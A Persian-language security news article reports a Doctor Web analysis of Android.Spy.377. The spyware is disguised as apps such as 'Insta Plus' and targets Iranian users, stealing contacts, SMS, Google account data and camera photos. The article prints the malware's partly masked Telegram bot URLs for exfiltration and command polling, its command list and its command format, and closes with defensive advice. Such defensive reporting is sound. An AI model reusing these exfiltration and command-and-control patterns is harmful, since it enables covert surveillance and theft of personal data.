کاربران ایرانی هدف جاسوس‌افزار اندرویدی

به گزارش شرکت مهندسی شبکه گستر، محققان امنیتی Doctor Web از انتشار بدافزاری از نوع اسب تروا (Trojan) خبر داده‌اند که کاربران ایرانی را بر روی دستگاه‌های با سیستم عامل Android هدف قرار می‌دهد. به گفته این محققان اسب تروای مذکور که به Andriod.Spy.377 موسوم شده از طریق پودمان‌های تبادل اطلاعات Telegram توسط نویسنده یا نویسندگان خود مدیریت شده و اطلاعات شخصی و خصوصی افراد را سرقت می‌کند.

Andriod.Spy.377، در حقیقت، یک ابزار دسترسی از راه دور است که تحت پوشش برنامه‌های دیگری همچون “اینستا پلاس”، “پروفایل چکر” و “Cleaner Pro” و با بهره‌گیری از تکنیک‌های مهندسی اجتماعی گسترش می‌یابد.

اسب تروای Android.Spy.377 یک جاسوس‌افزار سنتی است که قابلیت اجرای دستورات مخرب را داراست. تفاوت اصلی آن با سایر اسب‌های تروای تحت سیستم عامل Android قابلیت مدیریت شدن آن از طریق پودمان‌های تبادل اطلاعات Telegram است.

به‌محض اجرا شدن، Andriod.Spy به کاربر صاحب دستگاه پیشنهاد می‌دهد تا از میزان محبوبیت خود در میان سایر کاربران Telegram مطلع شود. در صورت موافقت، از کاربر خواسته می‌شود که شناسه شخصی Telegram خود را وارد کند.

پس از وارد شدن اطلاعات درخواستی در پنجره مربوطه، Andriod.Spy یک عدد دلخواه را تولید کرده و به کاربر نمایش می‌دهد. این تابع صرفاً برای جلوگیری از مشکوک به نظر رسیدن اسب تروا است. همچنین برخی اوقات پس از اجرا، Andriod.Spy.377، میان‌بر (Shortcut) خود را از صفحه اصلی دستگاه حذف کرده و پنجره خود را جهت پنهان ماندن متوقف می‌کند.

پس از حذف میان‌بر، Android.Spy.377 فهرست تماس‌ها، پیامک‌های ارسالی و دریافتی و اطلاعات حساب کاربری Google کاربر را کپی کرده و آنها را در یک فایل متنی در حافظه جانبی و مسیر /Android/data ذخیره می‌کند.

فایل‌های ایجاد شده توسط اسب تروا عبارتند از: (IMEI به شناسه International Mobile Equipment Identity دستگاه آلوده شده اشاره دارد)

• <imei + numbers.txt> – اطلاعات فهرست تماس‌ها
• <Imei + sms.txt> – تمامی پیامک‌های ذخیره شده ارسالی و دریافتی
• <Imei + acc.txt> – اطلاعات حساب کاربری Google کاربر

علاوه بر آن، Android.Spy.377 از طریق دوربین جلویی گوشی اقدام به عکسبرداری کرده و ضمن ارسال عکس گرفته شده و اطلاعات سرقت شده به سرور فرماندهی (Command & Control) خود، پیامی را که به آلوده شدن موفقیت‌آمیز دستگاه اشاره دارد به ربات Telegram زیر ارسال می‌کند:

http://api.telegram.org/bot3399*****:AAHeJoVC3i8zzwXhtCQMBoev***********/sendmessage

نمونه‌ای از متن پیام ارسالی در زیر قابل مشاهده است:

chat_id15255796&text=نصب+جدید
[user’s mobile number]
IMEI+:+:8680*******2554
Android+ID+:+fad6c1*******1dc
Model+:+[device name]
***.***.137.202
IMEI2554*******8680+:دستگاه

تصویر زیر نیز نمونه‌ای از مجموعه فایل‌های ارسال شده به نویسنده یا نویسندگان Andriod.Spy.377 را نشان می‌دهد.

به گزارش شرکت مهندسی شبکه گستر، پس از سرقت اطلاعات خصوصی، Andriod.Spy.377 مجدداً از طریق نشانی زیر به ربات Telegram خود متصل شده و منتظر دریافت فرامین کنترلی می‌ماند.

https://api.telegram.org/bot3399*****:AAHeJoVC3i8zzwXhtCQMBoev***********/getupdates?offset=-1

این اسب تروا قادر به دریافت و اجرای فرامین زیر است:

• call – برقراری تماس صوتی
• sendmsg – ارسال پیامک
• getapps – ارسال اطلاعاتی درباره برنامک‌های نصب شده به سرور
• getfiles – ارسال اطلاعاتی در مورد تمامی فایل‌های در دسترس به سرور
• getloc – ارسال اطلاعات موقعیت جغرافیایی دستگاه
• upload – بارگذاری فایلی که در ادامه دستور مشخص شده است و ذخیره آن فایل بر روی دستگاه
• removeA – حذف فایلی که در ادامه دستور به آن اشاره شده است
• removeB – حذف گروهی از فایل‌ها
• lstmsg – ارسال اطلاعاتی در مورد تمامی پیامک‌های ارسالی به سرور؛ این اطلاعات شامل شماره فرستنده، گیرنده و محتوای پیام نیز می‌شود.
• yahoo – این دستور پیاده‌سازی نشده است.

قالب فرمان ارسال شده به اسب تروا، به صورت زیر است:

command@imei@parameters

هنگامی که یکی از دستورات فوق اجرا شوند، Andriod.Spy.377 اطلاعات بدست آمده را به ربات Telegram خود ارسال می‌کند. (در عبارت زیر در قسمت [phoneNumber] شماره تلفن دریافت شده از دستور قرار می‌گیرد)

https://api.telegram.org/bot3399*****:AAHeJoVC3i8zzwXhtCQMBoev***********/sendmessage?chat_id=275899582&text=call with”+ message[phoneNumber]

علاوه بر جمع‌آوری اطلاعات خصوصی، هنگامی که اسب تروا فرمانی را از ربات Telegram دریافت کند قادر است به صورت مستقل تمامی پیامک‌های ارسالی و دریافتی و مختصات جغرافیایی دستگاه را رصد کرده به محض ارسال و یا دریافت پیامک یا تغییر مختصات جغرافیایی دستگاه، موضوع را به ربات Telegram خود اطلاع دهد.

برای ایمن ماندن از گزند این نوع بدافزارها، رعایت موارد زیر توصیه می‌شود:

• سیستم عامل و برنامک‌های نصب شده بر روی دستگاه همراه خود را همیشه به آخرین نسخه ارتقاء دهید.
• برنامک‌ها را فقط از بازار توزیع دیجیتال رسمی شرکت Googleو (Play Store) یا حداقل بازارهای مورد اعتماد معروف دریافت کنید. همچنین از غیرفعال بودن گزینه Unknown sources در بخش Settings و از فعال بودن گزینه Scan device for security threats در قسمت Google Settings دستگاه اطمینان داشته باشید. با غیرفعال بودن گزینه نخست، از اجرا شدن فایل‌های APK میزبانی شده در بازارهای ناشناخته بر روی دستگاه جلوگیری می‌شود. وظیفه گزینه دوم نیز پایش دوره‌ای دستگاه است.
• پیش از نصب هر برنامک امتیاز و توضیحات کاربران آن را مرور کرده و به نکات منفی توضیحات کاربران بیشتر توجه کنید.
  به حق دسترسی‌های درخواستی برنامک در زمان نصب توجه کنید. اگر فهرست آن به‌طور غیرعادی طولانی بود از نصب آن اجتناب کنید.
• از راهکارهای امنیتی قدرتمند برای حفاظت از دستگاه‌های همراه خود یا سازمانتان استفاده کنید.